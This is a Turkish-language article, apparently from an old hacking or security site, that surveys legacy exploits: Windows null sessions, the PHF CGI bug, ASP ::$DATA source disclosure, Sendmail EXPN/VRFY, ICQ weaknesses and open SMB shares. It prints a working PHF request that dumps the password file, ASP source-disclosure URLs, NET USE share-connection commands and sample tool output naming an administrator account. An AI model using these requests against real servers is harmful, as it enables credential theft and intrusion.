|
|
Exploitler genelde sistem tabanlı olarak çalışırlar yani Unix'e ait bir exploit Windows için çalışmaz. Bu güne kadar bulunan yaklaşık olarak 1000in üzerinde exploit vardır.
Windows Null Session Exploit : Windows işletim sistemi, dışarıdaki kullanıcılara network üzerinde hiç bir hakka sahip olmadan session, user ve share information'ı verir. Kötü niyetli birisi bu exploiti kullanarak sistem hakkında çok kritik bilgiler sahibi olabilir.
Örnek :
Agis NT Peek utility V0.5 , (C) Copyright by Agis Corp 1998. All rights reserved. Connecting to : \\194.***.**.** connection established Processing.. \\194.***.***.***\NETLOGON (disk) Logon server share \\194.***.***.***\i386 (disk) \\194.***.***.***\IE4.3000 (disk) Getting Session information .. Server name : TiN User name : (None) Login Time : 154461 secs (2574 mins) IIdle Time : 559 secs (9 mins) ----------------------- Server name : MiP Usern name : (None) Login Time : 573 secs (9 mins) Idle Time : 573 secs (9 mins) ----------------------- [lord*****] Password : ********** Account : (lord*****) Full name : (Lord zerg ******) Comment : (Administration account) User Comment : (Dark throne) Password age : (0) hours Privledge : Administrator Home Dir : () Script path : () Spec Params : () Workstations : () Logon Hours : (1349551) # of badpass : (0) Logon count : (2896) Logon Server : (\\*) Country Code : (0) Code Page : (0) User ID : (500) Group ID : (512) Profile : () Home drive : () Password Exp : (0) Auth Flags : -No auth flags Flags : - The logon script executed - This account is normal - password doesn't expire - user can change password
PHF Exploit : Bu exploit oldukça eski olmasına rağmen halen karşılaşabilecek bir güvenlik açığıdır, PHF CGI yardımı ile sistemdeki dosyalara admin olarak erişilebilinir.
GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd http://www.phfcalistiranserver.com/cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd
Yukarıdaki örnek Unix işletim sistemi ya da türevini kullanan bir makineden User bilgilerinin ve de şifrelerinin bulunduğu Password dosyasının görülmesini sağlar.
ASP Exploit : Active Server Page özelliği kullanan WebServerlarda URL' nin sonuna bir nokta(.) yada ::şDATA yazılarak ASPnin içeriği (source code) görülebilir. Eğer ASP'nin içerisinde her hangi bir şifre varsa bu exploit çok tehlikeli olabilir.
http://www.aspkullananserver.com/default.asp. ya da http://www.aspkullananserver.com/default.asp::$DATA
Sendmail Exploit : Eski Sendmail versiyonlarında birkaç basit hile ile sistemin şifrelerinin tutulduğu dosyayı çekmek mümkün olabilir. Ayrıca sistem kullanıcıları hakkında bilgi almak (EXPN) yada bir Usernamein o Serverda olup olmadığını öğrenmek de mümkündür. (VRFY)
telnet mail.server.com:25
ICQ Tabanlı Exploitler : Son derece zayıf bir mimariye sahip olan ICQ sistemi, kolayca taklit edilebilen, hatta gerçek spoofing bile yapılmasına gerek kalmayan bir sistemdir. ICQ kullanıcıları kolayca mesaj bombasına tutulabilir, passwordleri değiştirilebilir, onaya gerek kalmadan listeye alınabilir. IP'sini kullanıcı gösterme dese bile görülebilir yada ICQ chat yaparken mesaj taşması (flooding) yapılabilir.
Windows 95 yada NTde paylaşıma açılan disk ya da klasörlerin okuma-yazma izinlerine çok dikkat edilmelidir. Şifresiz (Şu birçok ISPnin Inetpub Directory'sini tüm dünyaya yazma izni vererek paylaşıma açması gibi) ya da kolay tahmin edilebilecek (username ile aynı) bir şifre ile paylaşıma açılan disk yada klasörlerin her türlü saldırıya açık olması gibi durumlar istenmeyen durumlara yol açabilir.
Windows Start menüsünde Run seçeneği tıklatıldıktan sonra \\IP yazıp Enter tuşuna basılırsa, IP'si yazılan makinede paylaşıma açık olan yerler görülebilir. Windowsun içinde var olan NET komutunu kullanarak (NET VIEW \\IP) yine paylaşıma açık yerleri görebilir ve yine aynı komutla onlara bağlanılabilir.
(NET USE J: \\IP\paylaşımismi) Ayrıca linux yüklü bir makineden, smbclient programı ile aynı işlemleri yapılabilir.
Bu tip tehlikelerden korunmak için paylaşımlara sağlam bir şifre zorunludur. (anlamsız kelime+ rakamlar+hem büyük hem küçük harf kullanıması vs.)
Diğer Araçlar : Snork, cachecow, ADMmountd, mountd, faxsurvey, vintra,hotmail_exploit1-2, ioconfig lpd-rm, dilloncrond, nameserver_dead, lpd-mail, imapd4, binfo-udp, pinebug, mailxploit, newxterm, mailex, metainfo, xterm_exploit, dip3.3.7overflow-exploit, coke ve daha bir çok exploit bulunuyor.
|
|